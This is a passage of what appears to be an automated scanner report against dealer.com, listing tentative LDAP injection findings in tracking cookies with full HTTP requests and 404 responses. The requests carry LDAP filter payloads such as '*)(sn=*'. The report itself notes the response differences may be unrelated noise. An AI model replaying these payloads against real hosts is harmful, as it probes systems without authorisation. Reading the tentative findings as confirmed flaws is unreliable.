Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=d62447ad87cf5458)(sn=*; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20162
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:26:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003618; expires=Mon, 16-Apr-2012 01:26:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video S
...[SNIP]...

Request 2

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=d62447ad87cf5458)!(sn=*; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20238
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003619; expires=Mon, 16-Apr-2012 01:26:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>People do ask me quite a bit, &#8216;what website provider will best help me with my search engine marketing and optimization?&#8217; I tell them the first thing they need to do is talk to Dealer.com.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>What I like best about SocialRelationship Manager&#8482; is it enables me as a dealer to both listen and to speak to my audience and customers on a platform that is so simple to use.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSi
...[SNIP]...

1.9. http://www.dealer.com/products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./company/contact/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./company/contact/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads c57a1dde651b3a70)(sn=* and c57a1dde651b3a70)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./company/contact/ cookie. This is the disjunctive (|...) variant of the check: a random token takes the place of the original value, the first payload then appends a well-formed (sn=*) term, and the second inserts a bare !, which is invalid filter syntax. The two requests produced different responses, which the scanner treats as a sign that the input may be incorporated into a disjunctive LDAP query unsafely.

Caveat: both responses are 404 pages for a loading.gif path that does not exist, and they differ in Content-Length (20260 against 20438), Date, Set-Cookie and the rotating testimonial and ad blocks, none of which can be tied to the payload. The Tentative confidence should be read accordingly.

Request 1

GET /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/search-engine-optimization/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=c57a1dde651b3a70)(sn=*; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003110; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A3%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.54.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20260
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:21:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003319; expires=Mon, 16-Apr-2012 01:21:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http
...[SNIP]...

Request 2

GET /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/search-engine-optimization/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=c57a1dde651b3a70)!(sn=*; com.silverpop.iMA.page_visit./products/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003110; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fproducts%2F%22%3Bi%3A3%3Bs%3A17%3A%22%2Fcompany%2Fcontact%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.54.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20438
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003319; expires=Mon, 16-Apr-2012 01:21:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I really enjoy being able to go in and add a page, create the meta data for that page, and immediately have it show up. It has been tremendously helpful for us.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO
...[SNIP]...

1.10. http://www.dealer.com/products/sales-analytics/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/sales-analytics/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/sales-analytics/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/sales-analytics/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./solutions/agencies/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./solutions/oem/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003126; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Fsales-analytics%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.57.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20170
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com's CarFlix videos impressed me a lot because I don't have to go to more than one vendor for my video. </p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
...[SNIP]...

Request 2

GET /products/sales-analytics/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/sales-analytics/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./solutions/agencies/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./solutions/oem/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003126; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Fsales-analytics%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.57.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20305
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdo
...[SNIP]...

1.11. http://www.dealer.com/solutions/agencies/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/agencies/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=*)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003120; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.55.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20166
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

